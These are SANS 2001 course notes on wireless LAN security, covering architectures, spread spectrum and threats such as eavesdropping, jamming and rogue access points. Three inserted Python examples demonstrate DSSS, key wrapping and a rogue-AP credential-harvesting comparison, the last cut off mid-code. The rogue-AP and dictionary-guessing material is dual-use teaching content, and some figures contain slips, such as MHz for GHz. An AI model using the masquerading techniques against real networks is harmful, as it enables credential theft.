Wireless Networking Security by tamthinguyen

Wireless Networking Security

Security Essentials
The SANS Institute

Encryption and Exploits - SANS ©2001   1

Hello, in this module we are going to discuss wireless networking. Specifically, we'll take a look at
how wireless technology works, how it is commonly deployed, and the security issues associated
with using it. Because wireless communications can penetrate opaque objects such as buildings, the
risk of someone accessing a private network increases markedly. With wireless, an attacker does not
need to gain access to physical cables or jacks, but only needs to have an antenna and be within
range of the transmissions.
We will focus a great deal of this discussion on wireless LANs (WLANs). For the most part we think
of these like regular LANs -- with workstations, servers, and laptops -- but without the wires.
However, it is important to remember that wireless devices include cell phones, pagers, PDAs, etc.
These less powerful devices are very widely deployed and are increasingly being used to connect to
the Internet. Further, their computational capabilities are becoming ever more sophisticated, making
the devices vulnerable to traditional Internet threats such as viruses and worms.
We will explore several aspects of wireless security in this part of the course, but before jumping in it
is interesting to note that industry analysts are projecting extreme growth in the worldwide wireless
market over the next few years. Some even speculate that the number of wireless devices accessing
the Internet will soon surpass that of wired PCs (expected to happen around 2003).

The link below points to a report by IDC that provides some interesting background on the wireless
industry, and discusses future challenges -- many of which revolve around wireless security.

Popular Wireless Devices

• PDAs
• Cellular phones
• Palmtops
• Laptops
• Pagers
                             Wireless Networking - SANS ©2001                                    2

The popularity of wireless devices is staggering, and the trend shows no sign of slowing. The
worldwide mobile data market is expected to be worth $80 billion by 2010. The wireless LAN
market alone is expected to grow to over US $2 billion by 2002. Further, forecasters expect more
than 1 billion wireless phones to be in use worldwide by 2003.

Any device that can interact with the Internet must be prepared to handle the hostility of the Internet
environment. Any Internet-connected node can be attacked. Further, the mounting sophistication of
wireless devices, combined with wide deployment, makes them attractive targets. As an example of
the increasing computational complexity of cell phones, consider this recent article (link below) that
likens the capabilities of today's cell phones to arcade games from the 1970s. Even more interesting
is the fact that there is an entire market evolving around networked cell phone gaming! In some cases
networked gameplay includes having cell phones accept executable code from the air. Such a
"feature" could provide a whole new avenue of entry for malicious code.

Finally, the fact that wireless transmissions are, well ... wireless, makes them vulnerable to yet
another class of threats. Attackers wishing to eavesdrop or disrupt wireless services can do so with a
RF receiver or transmitter, and do not need to gain physical access to any wires. Worse, over the
course of this discussion we will see that many of the wireless technologies in use today were not
designed with strong security in mind. Anyone using or considering WLAN technology should be
aware of the technology weaknesses, threats to wireless networks, and the available defenses.

Why Wireless?

• Wireless solves problems that wired solutions cannot address
• Users can access the network from anywhere
• Users can be mobile while staying connected
• Usable in environments where wires are problematic
   - Historic buildings with construction restrictions
   - Factories, assembly lines, warehouse floors, hospital rooms, stock trading floors
   - Temporary networks, such as for exhibitions


So what's so great about wireless? Why does everyone want wireless LANs? The Gartner Group,
Inc. has released a study forecasting that more than half of the Fortune 1,000 companies will have
deployed wireless LANs within the next two years. Why?
The reason is that wireless LANs provide freedom -- the freedom to move around, and freedom from
the hassles and expenses of running wires. It is sometimes more cost effective for an organization to
deploy a wireless network than to run wires through the walls of their office buildings. Further, the
convenience of having employees bring their laptops to meetings and then take them back to their
desks (without any service interruptions) is not to be underestimated. Home WLAN users enjoy
working on the computer from the living room couch or a lounge chair in the yard rather than being
confined to the home's "computer room".
Wireless networks also enable connectivity in places where it just wasn't possible before. Historic
buildings often have restrictions against punching holes in walls and ceilings. Factories and assembly
lines would typically be dangerous places to run wires, but wireless provides a solution. Wireless
allows doctors to access patient record databases while making their rounds. Warehouse workers can
carry wireless order-taking devices as they move around the warehouse checking inventories. And of
course, wireless networks can be set up and torn down quickly, making them ideal for short term
engagements like exhibitions and business meetings.
Clearly there are many cases when wireless technologies provide big advantages.

Wireless Vertical Markets

• Healthcare
• Retail
• Academia
• Factories
• Financial

This slide provides some more information about how wireless technologies are being used in various industries.

• To allow doctors and nurses to communicate with network systems to gain access to patient medical records,
treatment information, and prescription information while wandering through the hospital
• To use with roving lab equipment to have it send statistics into the network patient database
Retail and Food Service
• To allow inventory information to be scanned in and update the inventory database remotely
• To allow restaurant orders to be transmitted back to the kitchen right away
• To support roaming students around campus without having to put in a wired infrastructure to provide them
with access to internal campus systems and the Internet.
• To provide wireless connectivity in environments that won’t support regular wired connections
• Stock control
• Customer pickups
• Trace inventory to the responsible parties
• Warehouse workers use wireless LANs to exchange information with central databases and increase their
• To allow traders to update exchange information right away through wireless instead of using paper and pen or
hand signals
• COMEX, the Commodity Exchange, which deals in futures and options for gold, silver, platinum, palladium,
copper, and European equities, uses wireless LANs. The exchange uses hand-held devices with touch screens so that
information can be updated right away in the price reporting system. In the past, price reporters would use
hand signals to alert a supervisor, who would call the price change to a data entry clerk, who would then enter the
information into a computer.
• AMEX has traders that can get current price quotes and execute trades via their hand-held devices. In the past
traders used order slips.

Wireless LAN Network

• Ad-hoc/Peer-to-Peer
• Single Access Point (AP)
• Multiple Access Points (APs)


Now let's talk about how wireless LANs are architected and deployed.
Typically, WLANs are configured in one of three ways: Ad-Hoc (sometimes called peer-to-peer),
Single Access Point (sometimes called one-to-local access), and Multiple Access Points (sometimes
called one-to-many access). We will consider each of these architectures in the next few slides.
In the terminology of IEEE's 802.11 protocol standard, network architectures that do not use an
access point are called "ad hoc", and architectures that include access points are called



In an ad-hoc network, wireless stations communicate directly with each other. A good description is
given in the ExtremeTech article "Wireless LAN Deployment and Security Basics" referenced and
quoted below:

"In the ad-hoc network, computers are brought together to form a network "on the fly". There is no
structure to the network, there are no fixed points, and usually every node is able to communicate
with every other node. An example of a situation where an ad hoc network would be useful is a
meeting where everyone brings laptops in order to work together and share common documents.
Although it seems that order would be difficult to maintain in this type of network, algorithms such
as the "spokesman election algorithm (SEA)" have been designed to "elect" one machine as the base
station (master) of the network with the others being the slaves. Another algorithm in ad-hoc network
architectures uses a broadcast and flooding mechanism to all other nodes to establish who's who.
In an ad hoc wireless network, participating clients associate with each other through the use of a
common network identifier. Once associated, they can share files and other resources exactly as they
would in a wired peer-to-peer network. The limitations of wireless peer-to-peer networking are the
same as wired peer-to-peer networking -- administrative hassles and poor scalability. Though
convenient to set up, they are difficult to manage when you have more than just a few nodes. The
recommended practice is that ad hoc networks only be used for the smallest of networks where
convenience is paramount and security is not an issue. No doubt people can imagine that large peer-
to-peer networks could be very useful in temporary situations, such as large business meetings. In
fact, at the Fall 2001 Intel Developer Forum in San Jose, there was a technology demonstration of an
ad hoc, self-configuring wireless network that involved about 500 people in the audience all
attaching to the same network within about 10 seconds."

Single Access Point


In the configuration shown above, one or more wireless clients use an "access point" (AP) to
connect to a wired network, and ultimately to the Internet. Typically, the AP works by forming an
"association" with the wireless clients and then acting as a bridge between the clients and the wired
network. The AP is also responsible for performing network synchronization tasks that allow the
client to interact as if it were directly connected to the wired network. An example of such a task is
the forwarding of broadcasts to the wireless LAN.
Further, the AP is responsible for authenticating wireless clients and deciding whether a particular
client should be allowed to access the network. Typically, authentication is performed based on a
"password" (more on this later) and possibly on the client's MAC address. The process of association
can be described as a handshaking mechanism between the AP and a wireless device that ensures
that the device is only connected to one AP at a time. The area surrounding the access point is
referred to as a "Basic Service Set", or BSS.

Because the wireless signal strength decreases as distance from the access point increases, client
stations that are far from the AP will experience degraded network performance. Worse, clients that
are close to the AP can sometimes monopolize the available bandwidth, leaving far away clients
starved for network resources. In order to increase the range and coverage of the wireless network, it
is necessary to deploy additional access points. The multiple access point configuration is
referred to as an Extended Service Set (ESS), and is described next.

Multiple Access Point


This slide shows several wireless clients connecting to the network via multiple access points. This
"one-to-many" setup allows users to roam around provided they remain within range of at least one
AP. The access points communicate amongst themselves and "hand off" the user's information as
needed. The idea is to keep the client connected to the "closest" AP regardless of how the client
moves. In this context, "closest" means the AP that is able to exchange the strongest communications
signal with the client. The client device makes the decision automatically on-the-fly based on the
strength of the beacon signals it receives from each nearby access point. The strongest signal wins.

Infrared Wireless Networks

• 2 Mbps
• Cannot penetrate opaque objects
• Uses directed or diffused technology
   - directed (requires line of sight)
   - diffused (limited to short distances such as a single room)


In wireless networks, information is transferred using electromagnetic waves, most commonly via
radio and infrared signals. Of the two, radio-based wireless networks are more commonly deployed,
as infrared signal propagation requires either a direct line of sight or a short transmission distance.
In this slide we consider the different types of Infrared wireless technology called "directed" and
"diffused". The online report entitled "Wireless Networks" (link below) provides a good description
of the two mechanisms and is reproduced below.

"Directed infrared requires a clear line of sight to make a connection. The most familiar direct
information communication device is the TV remote control. A connection is made by transmitting
data using two different intensities of infrared light to represent the ones and zeros. The infrared light
is transmitted in a 20 degree cone giving some flexibility in orientation of the equipment, but not
much. Some disadvantages exist with direct connections, one of which is range, usually restricted to
less than 3 meters. Also because it needs a clear line of sight, the equipment must be pointing
towards the general area of the receiver or the connection is lost. However, advantages include low
cost and a highly reliable data rate.
 Diffuse infrared technology operates by flooding an area with infrared light, in much the same way
as a conventional light bulb illuminates a room. The infrared signal bounces off the walls and ceiling
so that a receiver can pick up the signal regardless of orientation. Diffuse infrared technology is a
compromise between direct infrared and radio technology. It combines the advantages of high data
rates from infrared and the freedom of movement from radio. However, it also inherits some
disadvantages. For example, although it transmits at 4Mbits/s -- twice that of current radio systems,
this must be shared among all users, unlike direct infrared. And although a user can roam around
freely, which is an advantage over direct infrared, the user is still confined to individual rooms unlike
when using radio signals, which can pass through walls."

Radio Frequency (RF) Wireless Networks

• Most popular WLAN technology
• Covers longer ranges
• Penetrates walls
• Most use 2.4 GHz frequency range
• Includes narrowband and spread spectrum
• Previous versions ran at max of 2 Mbps
• Most current versions run at 11 Mbps
• New standards allow use at 54 Mbps

As noted on the previous page, radio signals have the advantage of being able to penetrate walls.
This means that the network architect has much more flexibility in deciding how the network should
be configured. Radio signal technology is what makes WLANs practical for large scale deployment.
The report referenced on the previous page (link below) provides some interesting background on
radio technologies which will serve us well in this discussion. The relevant information is reproduced

"Radio network technology exists in two forms: narrowband technology and spread spectrum
technology. Narrowband systems transmit and receive data on a specific radio frequency; the bands
are kept as close together as possible and strong filters are used to filter out other signals to make
efficient use of the bandwidth. In order to prevent different signals from interfering with each other,
a regulatory body was set up to licence the frequencies and monitor their use. These licences are very
expensive and in the past have prevented manufacturers from using narrowband technology, an
example of a narrowband network would be a commercial radio station. In the early 1990s, the
regulatory bodies around the world set aside a band at 2.4GHz (the Instrumental, Scientific and
Medical band) for use by new technologies. This band could be used without a license making it
more accessible for private networks, and consequently manufacturers soon started to produce
products which used the new band. However, one condition of using the ISM band was that signals
must share the airwaves with one another, and as narrowband methods did not allow this, spread
spectrum technology was used instead.
Spread spectrum technology spreads the signal out over the whole band preventing concentration of
the signal in any one place, which allows large numbers of users to share the same bandwidth. There
are two different methods involved in spread spectrum technology, Direct Sequence and Frequency
Hopping, with both having advantages and disadvantages associated with them."
Spread spectrum technologies are discussed next.

Spread Spectrum Technology

DSSS (Direct Sequence Spread Spectrum)
• Data is segmented and different segments are sent on different frequencies
• Transmitter sends a redundant bit pattern called a "chip" along with each informational bit

FHSS (Frequency Hopping Spread Spectrum)
• Transmitter and receiver agree on pseudo-random frequency changes, called "hopping"
• Data is sent in short sequential bursts, one burst on each frequency

Direct Sequence Spread Spectrum works by chopping the signal into small pieces and spreading
the pieces across the frequency domain. The particular "chopping algorithm" is defined by
something called the "spreading code". Only receivers who know the unique spreading code being
used can decipher the signal. In fact, the uniqueness of each spreading code is what allows multiple
DSSS transmitters to operate in the same area at the same time. Because each transmission is spread
across a wide frequency band, the per-frequency transmission power is low. Thus, "bystander" radio
users see a direct sequence transmission as low power background noise rather than interference.
The downside of having DSSS signals be low power and spread across a number of frequencies is
that the transmissions become susceptible to noise corruption. To combat noise problems, DSSS uses
redundancy to recover the signal in the case of lost data. Specifically, DSSS adds redundant
information called "chips" to the signal, usually at the rate of 10 chips per data bit. Using more
"chips" directly increases the immunity from noise interference.
On the other hand, Frequency Hopping Spread Spectrum operates by splitting the signal up across
the time domain. Short bursts of data are sequentially transmitted on different narrowband
frequencies. The sequence of frequencies used by the transmitter (called "hops") is chosen
pseudorandomly. The receiver also knows the pseudorandom sequence, allowing it to synchronize
with the transmitter and recover each short burst of data. Other radio users see the frequency hopping
signal as short bursts of noise.
In general, Frequency Hopping devices use less power and are cheaper than Direct Sequence
devices. However, Frequency Hopping devices tend to be less resistant to interference and have
lower overall performance.

The report referenced on the previous page provides additional information.
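The spreading and despreading just described, worked through as an added example (this is not code from the SANS course). It uses the 11-chip Barker sequence that 802.11 DSSS transmits for each bit plus a second, constructed code, and idealises the channel as perfectly time-aligned +1/-1 chips with noise modelled as chip sign flips:

```python
"""Direct Sequence Spread Spectrum (DSSS), worked through in Python.

Added example, not code from the SANS course. It demonstrates the three
DSSS properties the notes describe: a receiver needs the spreading code to
make sense of the chips, the chip redundancy absorbs noise, and two
transmitters with different codes can share the same band. The channel is
idealised: chips are +1/-1 samples, noise is modelled as chip sign flips,
and overlapping transmitters are assumed to be perfectly time-aligned.
"""
import random

# 11-chip Barker sequence used by 802.11 DSSS at 1 and 2 Mbps.
BARKER_11 = (+1, -1, +1, +1, -1, +1, +1, +1, -1, -1, -1)

# Constructed second code for the shared-band demonstration. Its
# correlation with BARKER_11 is only +1, so the two signals barely
# disturb each other's despreading.
OTHER_CODE = (+1,) * 11


def spread(bits, code):
    """Replace each data bit by the code (bit 1) or its negation (bit 0)."""
    chips = []
    for bit in bits:
        sign = 1 if bit else -1
        chips.extend(sign * c for c in code)
    return chips


def correlate(chips, code):
    """Per-symbol correlation of received chips against a code.

    With the right code on a clean channel every value is +/-len(code);
    with an unrelated code the values stay close to zero, which is what a
    bystander radio (or a listener without the code) sees.
    """
    n = len(code)
    return [sum(chips[i + j] * code[j] for j in range(n))
            for i in range(0, len(chips) - n + 1, n)]


def despread(chips, code):
    """Recover data bits: the sign of each symbol's correlation decides."""
    return [1 if value > 0 else 0 for value in correlate(chips, code)]


def flip_chips(chips, flips_per_symbol, code_len=len(BARKER_11), seed=0):
    """Simulate noise by inverting a fixed number of chips in every symbol.

    Each flip lowers the correlation by 2, so up to 5 of 11 chips per bit
    can be wrong and the bit is still recovered; 6 flips invert it.
    """
    rng = random.Random(seed)
    noisy = list(chips)
    for start in range(0, len(chips), code_len):
        for j in rng.sample(range(code_len), flips_per_symbol):
            noisy[start + j] = -noisy[start + j]
    return noisy


def overlay(*streams):
    """Sum time-aligned chip streams, as a shared radio channel would."""
    if len({len(s) for s in streams}) != 1:
        raise ValueError("streams must be the same length")
    return [sum(samples) for samples in zip(*streams)]


if __name__ == "__main__":
    data = [1, 0, 1, 1, 0, 0, 1]
    tx = spread(data, BARKER_11)
    print("clean channel:   ", despread(tx, BARKER_11))
    print("5/11 chips wrong:", despread(flip_chips(tx, 5), BARKER_11))
    print("6/11 chips wrong:", despread(flip_chips(tx, 6), BARKER_11))
    print("wrong code sees: ", correlate(tx, OTHER_CODE))
    other = spread([0, 1, 1, 0, 1, 1, 0], OTHER_CODE)
    shared = overlay(tx, other)
    print("receiver A:", despread(shared, BARKER_11))
    print("receiver B:", despread(shared, OTHER_CODE))
```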

Top 5 Security Issues

1. Eavesdropping
2. Theft or loss of wireless devices
3. Denial of Service (DOS)
4. Wireless viruses
5. Masquerading


At this point let us turn our attention to a few security issues that arise in all types of wireless
networks, regardless of the protocol (e.g. WAP, Bluetooth, 802.11) employed. It turns out that
wireless networks face most of the same security issues, threats and vulnerabilities as wired
networks, along with a few additional problems of their own.

Wireless Eavesdropping

• Attackers can gain access to wireless transmissions without being close to the network
• Anyone with a suitable transceiver within range of the signal can eavesdrop
• Access can be gained while being hundreds of feet away (e.g. from a parking lot or nearby street)
• Difficult to detect eavesdropping
• Can gain access to confidential information
• Loss of information can be costly

Eavesdropping is very easy in the radio environment. When a message is sent over the radio path,
everyone equipped with a suitable transceiver in range of the transmission can receive the message.
Worse, the wireless transceiver equipment needed to perform eavesdropping is very reasonably
priced, and it is virtually impossible to detect that someone is "listening in".
It is important to note that the frequency band and transceiver power used has a great effect on the
range where the transmission can be heard. In the case of a 2 or 5 MHz radio band and transceiver
power up to 1 W (as in the case of the current wireless LAN standards) the wireless communications
can usually be heard from outside the building where the network is operating. Attackers know this,
and will often set up their transceivers and antennas in an unmarked vehicle parked on the street in
front of the building.

Protecting Against

• Use encryption in the higher layer protocols
• Use authentication and access control to prevent random strangers from being able to connect to the network
• Spread spectrum technology makes it more difficult for an eavesdropper to make sense of the transmissions
• Prevent AP from broadcasting SSID

Even if an attacker can "hear" a transmission, he will not be able to make sense of the information if
it is protected by encryption. Note that, in today's networks, simply turning on WEP encryption
(discussed later) is not sufficient. Automated tools are freely available to crack WEP encryption, so it
is necessary to implement encryption in the higher layer protocols. An example of such protection
would be using IPSec, SSL, SSH, or a VPN technology.
In addition, spread spectrum implementations can provide obstacles to eavesdropping. Unless the
attacker knows the particular frequency hopping or frequency spreading mechanism being used, he
will find it difficult to recover the transmitted signal. In order to be informed of the spread spectrum
information, the attacker needs to "associate" his receiver with the access point. In order to
"associate", the client device must know the WLAN "password" called the SSID. Unfortunately,
access points typically broadcast the SSID in a beacon signal, and will further respond with the SSID
when "pinged". Thus, in practice, random strangers usually find it easy to get the spread spectrum
information they need -- they simply listen for the SSID broadcast, and then use the broadcasted
information to associate with the access point. Now the rogue client is synchronized with the spread
spectrum mechanism in use.
Note: Some access point products allow the user to disable beacon broadcasts and responses to pings.
In such a configuration, an attacker would need to obtain the SSID via some other method in order to
associate with the AP. Other AP products do not allow the beacon signals and ping response to be

Risks due to Theft or Loss of Wireless Devices

• Wireless devices can be stolen or lost
• Devices can contain confidential corporate information
• Data stored on these devices is in clear text
• Attacker gains access to corporate network with stolen
• Attacker gains access to corporate data on the device
• Exposes network to possible malicious attacks and to Trojan horses or viruses entering the network


Because wireless devices are small and carried by mobile users, the devices are often lost or stolen.
An attacker who can recover a lost or stolen device gains access to all the information contained on
the device, and gains access to whatever authentication credentials the device possesses. We can
easily imagine a situation where an attacker who steals a mobile worker's laptop gains access to
sensitive company documents, and further gains access to the company internal network by using
cryptographic keys stored on the laptop to authenticate.

Protecting Against Risks due to Theft or Loss

• Audit devices connecting to network and create strong security policies for devices connecting to your network
• Hardware protection
• Data back-up
• Data encryption
• Device Access Controls and secure configuration
• Strong authentication
• Password policies
• Anti-virus software
• Application filtering
• Personal Use Restrictions


In order to protect against this threat, we must operate under the assumption that every wireless
device has the potential to fall into the hands of a malicious person. Our objective is to create a
security system that requires that the device be used by the right person before it will reveal its
In terms of protecting the documents, authentication credentials and other information stored on a
laptop or PDA, one potential solution would be to encrypt all data before it is written to the
filesystem. However, this scheme requires that the keys used to encrypt the data be made
inaccessible to an attacker. For example, if the keys themselves are stored in clear text on the device,
the data protection is worthless.
One way to solve the problem is to encrypt the data encryption keys themselves such that the keys
can only be unlocked by the correct user. Such a scheme must rely on a passphrase (something the
user knows), a physical key (something the user has), or biometric authentication (something the user
is) to unlock the keys that will decrypt the filesystem data.
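One way to build the passphrase-unlocked key scheme just described, as an added example that is not code from the SANS course. It assumes PBKDF2-HMAC-SHA256 for the key derivation and substitutes an HMAC-SHA256 counter-mode keystream with a separate authentication tag for a real cipher such as AES-GCM, so it runs on the Python standard library alone:

```python
"""Locking a laptop's data-encryption key behind a passphrase.

Added example, not code from the SANS course. The files are encrypted with
a random data-encryption key (DEK); the DEK is stored only in wrapped form,
under a key-encryption key (KEK) derived from the user's passphrase. A
thief who images the disk gets ciphertext plus a wrapped key that is
useless without the passphrase. Assumptions: PBKDF2-HMAC-SHA256 for the
KEK, and an HMAC-SHA256 counter-mode keystream with a separate HMAC tag in
place of a real authenticated cipher, so the script needs only the
standard library. A production implementation would use AES-GCM or similar.
"""
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 200_000
NONCE_LEN = 16
TAG_LEN = 32


def derive_kek(passphrase, salt):
    """Something the user knows, stretched into a 32-byte key-encryption key."""
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode("utf-8"), salt,
                               PBKDF2_ROUNDS, dklen=32)


def _subkeys(key):
    """Separate keys for confidentiality and integrity from one 32-byte key."""
    enc = hmac.new(key, b"enc", hashlib.sha256).digest()
    mac = hmac.new(key, b"mac", hashlib.sha256).digest()
    return enc, mac


def _keystream(enc_key, nonce, length):
    """HMAC-SHA256 in counter mode as a pseudo-random keystream."""
    out = b""
    counter = 0
    while len(out) < length:
        block = nonce + counter.to_bytes(4, "big")
        out += hmac.new(enc_key, block, hashlib.sha256).digest()
        counter += 1
    return out[:length]


def seal(key, plaintext):
    """Encrypt-then-MAC: returns nonce || ciphertext || tag."""
    enc_key, mac_key = _subkeys(key)
    nonce = os.urandom(NONCE_LEN)
    stream = _keystream(enc_key, nonce, len(plaintext))
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, stream))
    tag = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    return nonce + ciphertext + tag


def open_sealed(key, blob):
    """Verify the tag first; return the plaintext, or None if the key is
    wrong or the blob was modified."""
    enc_key, mac_key = _subkeys(key)
    nonce, ciphertext, tag = (blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN],
                              blob[-TAG_LEN:])
    expected = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    stream = _keystream(enc_key, nonce, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, stream))


def protect_device(passphrase, documents):
    """Initial setup: random DEK for the data, passphrase-derived KEK wraps
    the DEK. Only the returned dict is written to disk; the raw DEK and KEK
    never are."""
    dek = os.urandom(32)
    salt = os.urandom(16)
    kek = derive_kek(passphrase, salt)
    return {
        "salt": salt,
        "wrapped_dek": seal(kek, dek),
        "encrypted_data": seal(dek, documents),
    }


def unlock_device(passphrase, stored):
    """Login path: re-derive the KEK, unwrap the DEK, decrypt the data.
    A thief without the passphrase gets None at the first step."""
    kek = derive_kek(passphrase, stored["salt"])
    dek = open_sealed(kek, stored["wrapped_dek"])
    if dek is None:
        return None
    return open_sealed(dek, stored["encrypted_data"])


if __name__ == "__main__":
    # Constructed sample document; not real data.
    disk = protect_device("correct horse battery staple",
                          b"Q3 forecast (constructed sample)")
    print(unlock_device("correct horse battery staple", disk))
    print(unlock_device("guess1234", disk))
```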
Another useful protection mechanism revolves around the network being able to uniquely identify
each device that connects, and block access based on device identifier. If such protections are in
place, the network can begin rejecting connection attempts from a device as soon as it is reported

Denial of Service Attacks

• Attacker has a powerful enough transmitter that can generate radio interference -- jams all communication
• Cost of buying a transmitter for this kind of attack isn’t expensive
• Attack does not require specialized technical knowledge

Due to the nature of radio communications, wireless LANs are vulnerable to Denial of Service
attacks based on transmission jamming. If an attacker has a powerful enough transceiver, he can
generate so much radio interference that the targeted WLAN is unable to communicate effectively.
Like eavesdropping, this kind of attack can be initiated from a distance, for example from a van
parked on the street or from an apartment in the next block. Further, the equipment needed to wage
the attack can be purchased from any electronics store at a reasonable price, and any amateur radio
enthusiast has the knowledge needed to configure the equipment.

Protecting Against DoS

• Very difficult to protect against a jamming denial of service attack
• In small environments consider using Infrared instead of RF
• Operate wireless networks only from shielded buildings
• Locate and disable the attacking device


Protecting a WLAN against jamming-based denial of service attacks is difficult. The only real
solution is to implement RF shielding on the building that houses the wireless network. As might
be imagined, such a solution is very expensive and is only practical for extremely high-security
situations such as the military might require.
Recall that infrared transmissions are confined to a line of sight or a single room. Thus infrared
signals can only be jammed by an attacker with a line of sight to the receivers, and it is impossible
for an attacker who is separated from the infrared network by a wall to cause interference.
Unfortunately, due to the previously discussed limitations of infrared networks, this solution is
only appropriate for very small environments.
The good news is that an attacker who generates a flood of noise using a radio transmitter is a
strong, continuous emitter and so is easily located by direction finding. Thus, these attacks are
typically of limited duration, lasting only as long as it takes for the authorities to apprehend the
miscreant.

                              Wireless Viruses
         • Viruses affecting wireless devices have already been
         discovered in the wild
         • Timofonica is an e-mail worm that also sent SMS messages to
         randomly chosen mobile phone numbers
         • Phage is a virus that destroys all data and applications on
         devices running Palm OS
         • The disposable nature of handheld devices makes them
         attractive launch points for viruses and worms
         • Networked cell phone gaming may provide new avenues
         of entry for cell phone malware

The news articles linked below describe a cellular phone "virus" that surfaced in Spain during June
of 2000. The worm, named Timofonica, was in fact a VBScript e-mail worm running on Windows PCs: for
every e-mail address it harvested, it also sent a message through the Telefónica MoviStar
e-mail-to-SMS gateway to a randomly generated GSM phone number. The enabling technology was the
carrier's messaging gateway, which allowed any Internet host to "push" a message to a handset. The
phones themselves were not infected, but the incident showed how a carrier's messaging system can
be turned against its wireless subscribers.

In September of 2000, the first virus targeting the Palm handheld operating system was discovered.
According to Sophos and Symantec, the virus completely destroys all applications and data files on a
victim system. The virus is called Phage, is only 963 bytes long, and can be acquired by running an
infected executable on the Palm. Once run, the virus seeks out other Palm applications and
overwrites them with the viral code. The only way to recover from an infection is to reset the
handheld back to its factory defaults, and re-install everything (including applications) from a

McAfee claims that over 57,000 viruses have been discovered as of Jan 2002. Thus we can be certain
that there are many people capable of writing these malicious programs. This fact, combined with the
increasing sophistication and popularity of wireless devices, implies that it is only a matter of time
before wireless viruses become a big problem. Further, some experts predict that disposable
handheld devices may one day be used to launch new viruses into the public network.
Quoting Simon Perry of Computer Associates: “The time will come when there's a reasonable
chance one of these viruses will originate from a PDA that's used to launch a virus, then gets thrown
in a dumpster..... Try tracking that down.”

                Protecting Against Wireless Viruses
         Anti-virus protection for wireless devices is
         starting to become available
              • Trend Micro PC-cillin for Wireless
              • McAfee VirusScan Wireless
              • F-Secure AntiVirus for PalmOS, SymbianOS
              and PocketPC
              • Symantec AntiVirus for PalmOS


Anti-virus protection for handhelds is now being offered by the major anti-virus vendors. Some
information from Trend Micro's and McAfee's websites describing their products is reproduced
below. Experts expect antivirus software for cell phones to be made available eventually. Quoting
Gartner's John Pescatore (see article linked below): "The antivirus vendors are dying to sell antivirus
software for every cell phone."

Trend Micro http://www.antivirus.com/free_tools/wireless/
PC-cillin® for Wireless Version 2.0 for Palm OS now provides automatic real-time launch scanning
to prevent viruses that enter the device from every possible entry point - beaming, synching, email
and Internet downloading. Real-time launch scanning activates whenever applications on the device
are launched and prevents viruses from activating on the device.
McAfee http://www.mcafeeb2b.com/products/virusscan-wireless/default.asp
Not only does VirusScan Wireless offer coverage for all the major handheld device platforms, it also
gives you protection when you need it the most-when you synchronize. Your network is in the most
danger when users synchronize their PDAs with their PCs. That's when VirusScan Wireless kicks in,
scanning all files for all types of viruses and eliminating the chance of infection.
For PalmOS-based devices, such as Palm Pilots and Handspring Visors, VirusScan Wireless offers
another level of protection - on-device scanning. With on-device scanning, VirusScan Wireless can
protect your PDA from infection even when you transfer files via infrared link or access the Internet
wirelessly. VirusScan Wireless is the only solution that offers both on-device and on-sync protection
for Palm devices .
F-Secure http://www.f-secure.com/wireless/
Symantec http://www.symantec.com/sav/

                           Masquerading Attacks
       • Rogue client pretends to be a legitimate endpoint
            - Can obtain a working IP address via DHCP or by guessing
            - Rogue client becomes a node on the internal net behind
            all firewalls
       • Rogue AP tricks clients into logging in
            - Attacker needs rogue AP to present the strongest signal
            - Allows harvesting of authentication credentials

       • Difficult to detect

In general, there are two types of masquerading attacks, both of which are difficult to detect.
Most commonly, an attacker pretends to be a legitimate client and simply joins the wireless network
as a normal network node. To perform this trick, the attacker only needs to associate with the
WLAN's access point (using the SSID) and obtain a working IP address for the rogue device. DHCP
servers are usually happy to hand the rogue device an appropriate address, and even without DHCP
it is fairly easy for the attacker to sniff the address range in use, guess a free IP, and assign it
manually. If the masquerade is successful, the attacker's machine becomes a valid node on the
WLAN, bypassing any firewall protections that sit between the internal network and the Internet.
The attacker is now free to communicate with the other systems on the internal net, while
appearing to be just another internal system.
Another type of masquerading attack arises when the attacker tricks legitimate wireless clients into
thinking that a rogue access point is the one they are looking for. The only requirement is that the
attacker's access point present a stronger signal to the clients than the legitimate AP: clients
select, and attempt to associate with, whichever AP advertising the expected SSID presents the
strongest signal. From this vantage point the attacker is able to harvest whatever authentication
credentials the clients present as they attempt to log on to the network. Note that the attacker's
AP can simply deny the logon request while squirreling away the sensitive information. Because
failed logon attempts are common on wireless LANs, the client is unlikely to notice that anything is
amiss if the attacker plays his cards correctly.

                       Protecting Against Masquerading
           • Clients must be authenticated before
           being allowed to connect
           • Strong authentication mechanisms are
           best (e.g. MAC addresses can be spoofed)
           • Choose an authentication mechanism
           that will not reveal credentials to a rogue
           access point

In order to protect against masquerading attacks there must be some mechanism in place whereby the
client can individually authenticate with the access point before being allowed to connect. Many
access points allow clients to be authenticated according to MAC address -- while this is better than
nothing, MAC addresses can be spoofed, thus a determined attacker will be able to get around this
obstacle. To provide better protection, a strong authentication mechanism, such as one based on
public key techniques, should be employed. Whatever method is chosen, the requirements are that an
attacker not be able to spoof the credentials, and that the authentication handshaking not reveal any
sensitive client information (such as a password). The latter requirement arises from the need to
protect against information harvesting by a rogue access point.
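The difference between a mechanism that reveals credentials to a rogue access point and one that does not is easiest to see by running both against a fake AP. The following is an added example written for this edition, not part of the SANS material or any vendor's protocol: a toy authentication exchange between a client and an access point, with HMAC-SHA256 standing in for whatever keyed function a real system uses, a constructed network password and a constructed attacker wordlist. It compares a password sent in the clear, a one-way challenge/response in which only the client proves itself, and a mutual challenge/response in which the client sends nothing derived from the password until the AP has answered the client's own challenge.

```python
"""Added example: what a rogue access point harvests under three client authentication
designs.  Toy protocol with in-memory messages; HMAC-SHA256 is a stand-in for the real
authentication function (assumption, not any vendor's implementation)."""
import hashlib
import hmac
import os

NETWORK_PASSWORD = b"winter2001"                                   # constructed
WORDLIST = [b"password", b"letmein", b"winter2001", b"acme-wlan"]  # constructed attacker dictionary


def auth_tag(password, role, client_nonce, ap_nonce):
    """Keyed proof of knowledge of the password over both nonces (stand-in function)."""
    return hmac.new(password, b"|".join([role, client_nonce, ap_nonce]), hashlib.sha256).digest()


class LegitimateAP:
    def __init__(self, password):
        self.password = password

    def start(self, client_nonce=b""):
        self.ap_nonce = os.urandom(16)
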